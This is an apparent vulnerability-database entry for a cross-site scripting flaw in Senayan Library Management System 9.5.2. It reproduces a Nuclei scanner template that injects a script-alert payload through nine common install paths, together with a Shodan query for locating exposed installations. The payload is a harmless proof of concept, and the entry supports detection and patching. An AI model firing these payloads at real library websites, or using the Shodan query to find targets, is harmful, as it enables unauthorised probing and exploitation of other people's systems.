漏洞描述
SLiMS 9.5.2 (Bulian) vulnerable to Cross-Site Scripting in index.php. When injected, website will execute the payload repeatedly
slims-9-xss-index: Senayan Library Management System v9.5.2 (Bulian) - Cross-Site Scripting
PoC代码[已公开]
id: slims-9-xss-index
info:
name: Senayan Library Management System v9.5.2 (Bulian) - Cross-Site Scripting
author: nblirwn
severity: medium
description: |
SLiMS 9.5.2 (Bulian) vulnerable to Cross-Site Scripting in index.php. When injected, website will execute the payload repeatedly
reference:
- https://github.com/slims/slims9_bulian/issues/185
metadata:
verified: true
max-request: 8
vendor: slims
product: senayan_library_management_system
shodan-query: html:'content="SLIMS'
tags: senayan,xss,slims,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/perpustakaan/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/perpustakaan/slims/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/e-library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/perpus/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/digilib/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/bulian/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
- "{{BaseURL}}/library/index.php/%22--%3E<script>alert(document.domain)</script>/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- '<script>alert(document.domain)</script>'
- 'SLiMS'
- 'name="author'
condition: and
- type: word
part: content_type
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a004730450220373fd92bc65bc342d935d8fd89bdeaa412c6d1aced597d71c9bab08d835f3388022100ff104842d043a56b304a750198481a65b73852b4497252beb8d56744fa2c3f91:922c64590222798bb761d5b6d8e72950